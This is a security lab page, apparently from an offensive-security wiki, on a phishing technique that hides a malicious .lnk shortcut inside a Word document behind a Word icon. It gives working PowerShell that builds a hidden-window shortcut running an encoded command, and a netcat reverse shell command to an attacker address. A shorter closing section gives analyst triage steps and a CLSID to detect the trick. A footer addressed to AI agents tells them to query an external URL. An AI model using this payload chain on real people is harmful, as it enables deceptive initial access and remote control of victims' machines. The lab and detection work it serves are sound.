# Phishing: OLE + LNK This lab explores a popular phishing technique where attackers embed .lnk files into the Office documents and camouflage them with Ms Word office icons in order to deceive victims to click and run them. ## Weaponization Creating an .LNK file that will trigger the payload once executed: {% code title="attacker\@local" %} ```csharp $command = 'Start-Process c:\shell.cmd' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) $obj = New-object -comobject wscript.shell $link = $obj.createshortcut("c:\experiments\ole+lnk\Invoice-FinTech-0900541.lnk") $link.windowstyle = "7" $link.targetpath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $link.iconlocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe" $link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA==" $link.save() ``` {% endcode %} Powershell payload will trigger a rudimentary NC reverse shell: {% code title="c:\shell.cmd" %} ```csharp C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe ``` {% endcode %} Once the above powershell script is executed, an `.LNK` shortcut is created: ![](/files/-LKRGjwTWCMH7EOxbc_b) Let's create a Word document that will contain the malicious shortcut that was created in the previous step: ![](/files/-LKRH-VzxxtN9fSNg2js) Let's insert a new object into the document by selecting a `Package`and changing its icon source to a Microsoft Word executable: ![](/files/-LKRH8A1jNeHJgRGRomK) ![](/files/-LKRHOVbCzGL4Zo2WrpY) Point the package to the .lnk file containing the payload: ![](/files/-LKRIT6mm4h7eR5y9ONB) Final result: ![](/files/-LKRIbB24hFM9R322XmS) ## Execution Victim executing the embedded document. Gets presented with a popup to confirm execution: ![](/files/-LKRIrtSxtXDuyyIk0fC) Once the victim confirms they want to open the file - the reverse shell comes back to the attacker: ![](/files/-LKRIrtTxniAvaJ_vV5m) {% file src="/files/-LKRFRs6PmCItZfJf0iN" %} OLE+LNK Powershell Script {% endfile %} {% file src="/files/-LKRFM7BiZ-YUrYrELHD" %} Invoice-FinTech-0900541.lnk {% endfile %} {% file src="/files/-LKRFEk2QEZ6V0akcxvk" %} Phishing: OLE+Lnk MS Word Doc Package {% endfile %} ## Observations After the payload is triggered, the process ancestry looks as expected - powershell gets spawned by winword, cmd is spawned by powershell..: ![](/files/-LKRJFn47fbXoXbUavdK) Soon after, the powershell gets killed and cmd.exe becomes an orphaned process: ![](/files/-LKRJHK53l5r1CQKTwBT) Like in [T1137: Phishing - Office Macros](/offensive-security/initial-access/phishing-with-ms-office/t1137-office-vba-macros.md), you can use rudimentary tools on your Windows workstation to quickly triage the suspicious Office document. First off, rename the file to a .zip extension and unzip it. Then you can navigate to `word\embeddings` and find `oleObject.bin` file that contains the malicious `.lnk`: ![](/files/-LKRdsdTB5mK-QRljpQN) Then you can do a simple `strings` or hexdump against the file and you should immediately see signs of something that should raise your eyebrow(s): ```csharp hexdump.exe -C .\oleObject1.bin ``` ![](/files/-LKRfHZ7vT28S8ZGjHjx) As an analyst, one should look for `CLSID 00021401-0000-0000-c000-000000000046` in the .bin file, which signifies that the .doc contains an embnedded .lnk file. In our case this can be observed here: ![](/files/-LLLlfqklzz5ti7PtC1W) ## References {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.